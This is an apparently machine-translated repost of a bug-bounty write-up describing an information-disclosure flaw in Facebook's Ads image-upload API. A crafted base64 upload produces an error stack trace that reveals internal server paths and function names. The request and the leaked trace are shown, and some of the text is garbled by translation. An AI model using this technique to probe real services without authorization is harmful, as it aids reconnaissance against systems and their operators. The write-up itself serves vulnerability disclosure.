Shulou(Shulou.com)05/31 Report--

Today, I will talk to you about how to analyze the source code leakage vulnerabilities of the API interface of Facebook Ads advertising business. Many people may not know much about it. In order to make you understand better, the editor has summarized the following for you. I hope you can get something according to this article.

Find a loophole

More than a month later, I found a loophole in Facebook Ads advertising business system API. The flawed API is an image processing interface that is used for Facebook merchant accounts to upload advertising images, which are stored in a directory called "/ adimages" and encoded in base64 format. So, my test idea is that in the mechanism here, malicious Payload can be injected into the image, converted to Base64 format by API, and then passed into the server by Facebook.

The following is the POST request for uploading images:

POST / v2.10/act_123456789/adimages HTTP/1.1

Host: graph.facebook.com

Bytes=VGhpcyBpcyBtYWxpY2lvdXMgcGF5bG9hZC4=

Due to the Facebook server can not effectively deal with malicious Payload images, the final "Image Resizing Tool" image processing tool returned an error, in a JSON response to the content of the exception message, including some PHP library function code, these codes from different Facebook library files, it is certain that this should be part of the Facebook source code.

HTTP/1.1 200 OK {"error": {"message": "Invalid parameter", "type": "FacebookApiException", "code": 100 "error_data": "exception 'Exception' with message' gen_image_rescale_multi_thrift call to shrinkImageMulti failed with fbalgo exception: 43 (43:: IDAT: invalid distance too far back)'in\ / var\ / www\ / flib\ / resource\ / filesystem\ / upload\ / upload.php:1393\ nStack trace:\ n0,0 / var\ / www\ / flib\ / resource\ / filesystem\ / upload\ / upload.php (1662): gen_image_rescale_multi_thrift ( )\ nExhibit 1\ / var\ / www\ / flib\ / ads\ / admanager\ / adupload\ / adupload.php (252): gen_image_rescale_multi ()\ nroom2\ / var\ / www\ / flib\ / ads\ / admanager\ / adupload\ / AdImageUtils.php (195): _ gen_adupload_image_resize ()\ nroom3\ / var\ / www\ / flib\ / ads\ / entities\ / creatives\ / photos\ / AdproCreativePhotoDownload.php (53) : AdImageUtils::genResizeLocalFile ()\ nroom4\ / var\ / www\ / flib\ / platform\ / graph\ / resources\ / adaccount\ / adimages\ / mutators\ / GraphAdAccountAdImagesPost.php (): AdproCreativePhotoDownload::addLocalFileToCreativeLibrary ()\ nroom5\ / var\ / www\ / flib\ / core\ / utils\ / Arrays.php: Closure$GraphAdAccountAdImagesPost::genImplementation#3 ()\ nroom6\ / var\ / www\ / flib\ / platform\ / Graph\ / resources\ / adaccount\ / adimages\ / mutators\ / GraphAdAccountAdImagesPost.php (136): Arrays::genMapWithKey ()\ nroom7\ / var\ / www\ / flib\ / ads\ / api\ / graph_base\ / GraphAdsWriteWithRedirectBase.php (22): GraphAdAccountAdImagesPost- > genImplementation ()\ nroom8\ / var\ / www\ / flib\ / ads\ / api\ / graph_base\ / GraphAdsWriteWithRedirectBase.php (11): GraphAdsWriteWithRedirectBase- > genDoCall ()\ nroom9\ / var\ / www\ / Flib\ / core\ / asio\ / gen_utils.php (24): GraphAdsWriteWithRedirectBase- > genCall ():\ nroom10\ / var\ / www\ / flib\ / platform\ / api\ / base\ / ApiBaseWithTypedApiData.php (204): genw (): genw ()\ nroom11\ / var\ / www\ / flib\ / platform\ / api\ / base\ / ApiBase.php (85): ApiBaseWithTypedApiData- > genCallWithApiDataBase ()\ nroom12\ / var\ / www\ / flib\ / platform\ / graph\ / core\ / runner\ / GraphApiRunnerBase.php (373): ApiBase- > genMakeCall 13\ / var\ / www\ / flib\ / platform\ / graph\ / core\ / GraphRequestProcessorBase.php (629): GraphApiRunnerBase- > genCall ()\ nroom14\ / var\ / www\ / flib\ / platform\ / graph\ / core\ / GraphRequestProcessorBase.php (45): GraphRequestProcessorBase- > genExecuteSingleGraphRequestCore () 15\ / var\ / www\ / api\ / graph\ / server.php : GraphRequestProcessorBase- > genExecuteSingleGraphRequest ()\ nroom16\ / var\ / www\ / api\ / graph\ / server.php (17474): gen_api_graph_server ()\ nroom17\ / var\ / www\ / flib\ / core\ / asio\ / Asio.php (35): gen_api_graph_server_wrapper ()\ nroom18 (): Closure$Asio::enterAsyncEntryPoint ()\ nroom19\ / var\ / www\ / flib\ / core\ / asio\ / Asio.php (37): HH\\ Asio\\ join ()\ nroom20\ / var\ / www\ / api\ / graph\ / server.php (180): Asio::enterAsyncEntryPoint ()\ nroom21 {main} " "error_subcode": 1487242, "is_transient": false, "error_user_title": "Image Resize Failed", "error_user_msg": "Image Resize Failed:unknown reason", "fbtrace_id": "EN\ / o9hmqwZz"}, "_ fb_trace_id__": "EN\ / o9hmqwZz"} finish reading the above Do you have any further understanding of how to analyze the source code disclosure vulnerability of the API interface of Facebook Ads advertising business? If you want to know more knowledge or related content, please follow the industry information channel, thank you for your support.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.